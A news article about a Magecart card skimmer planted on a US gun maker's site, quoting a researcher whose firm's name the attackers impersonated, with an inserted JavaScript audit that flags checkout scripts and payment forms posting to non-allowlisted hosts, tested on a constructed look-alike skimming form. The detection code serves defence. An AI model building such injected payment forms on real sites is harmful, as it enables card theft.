The website of a leading American gun manufacturer was compromised by threat actors on Black Friday.
When the script is loaded, a fake payment form is displayed. If a customer enters their payment information and submits it, that information is sent to a remote server under the control of the threat actors.
The threat actors can then log into their server and retrieve the payment information.
De Groot explained that the Magecart group has been utilising the Sanguine Security name to legitimise the campaign, and using his name as the domain contact.
“Skimming code & infrastructure is identical to the campaign that impersonates Sanguine Security,” said de Groot. “Hacker registered skimming domains in my name and disguises as Sanguine protection.”
It can be assumed that the threat actors purposely chose Sanguine Security, as the majority of its work for customers is helping to protect them from Magecart attacks.
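The skimmer described above depends on a script loaded from, and a payment form posting to, an origin the merchant does not control, under a name chosen to look trustworthy. The following check is an added example, not code from the article or from Sanguine Security: it audits checkout markup against an exact-origin allowlist, and every host name, the sample HTML and the function name `findUntrustedEndpoints` are constructed for illustration.

```javascript
// Added example: all hosts and markup below are constructed for illustration.
const ALLOWED_ORIGINS = new Set([
  "https://shop.example",          // the store itself
  "https://pay.gateway.example",   // its real payment processor
]);

// Attributes that make the browser fetch code or send form data somewhere.
const SINKS = [
  { kind: "script", re: /<script\b[^>]*?\bsrc\s*=\s*["']([^"']+)["']/gi },
  { kind: "form-action", re: /<form\b[^>]*?\baction\s*=\s*["']([^"']+)["']/gi },
  { kind: "formaction", re: /<(?:button|input)\b[^>]*?\bformaction\s*=\s*["']([^"']+)["']/gi },
];

// Return every script source or form target whose origin is not allowlisted.
function findUntrustedEndpoints(html, pageUrl, allowed = ALLOWED_ORIGINS) {
  const findings = [];
  for (const { kind, re } of SINKS) {
    for (const match of html.matchAll(re)) {
      let origin;
      try {
        // Resolve relative and protocol-relative URLs against the page.
        origin = new URL(match[1], pageUrl).origin;
      } catch {
        origin = "unparseable";
      }
      // Exact-origin comparison: a trustworthy-sounding host name does not pass.
      if (!allowed.has(origin)) findings.push({ kind, url: match[1], origin });
    }
  }
  return findings;
}

// Constructed checkout page: one legitimate script and form, plus an injected
// script and a look-alike payment form posting to a third-party host.
const SAMPLE_HTML = `
<script src="/static/checkout.js"></script>
<script src="//cdn.security-protection.example/guard.js"></script>
<form action="https://pay.gateway.example/charge" method="post"></form>
<form action="https://collect.security-protection.example/save" method="post">
  <input name="cc_number"><input name="cvv">
</form>`;

const findings = findUntrustedEndpoints(SAMPLE_HTML, "https://shop.example/checkout");
for (const f of findings) console.log(`${f.kind}: ${f.url} -> ${f.origin}`);
```

Markup that a script injects at runtime does not appear in the static HTML, so the same check should also be run over a serialization of the rendered DOM.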
Magecart attacks can have serious financial repercussions, with the last major skimming case against Macy’s wiping $500m off its stock value: “Alas, for Smith & Wesson, the put options don’t seem to be in high demand right now. Carding has a better yield than stock manipulation?”
Customers who recently entered their payment information on the website are urged to contact their credit card company and monitor their statements for any suspicious charges.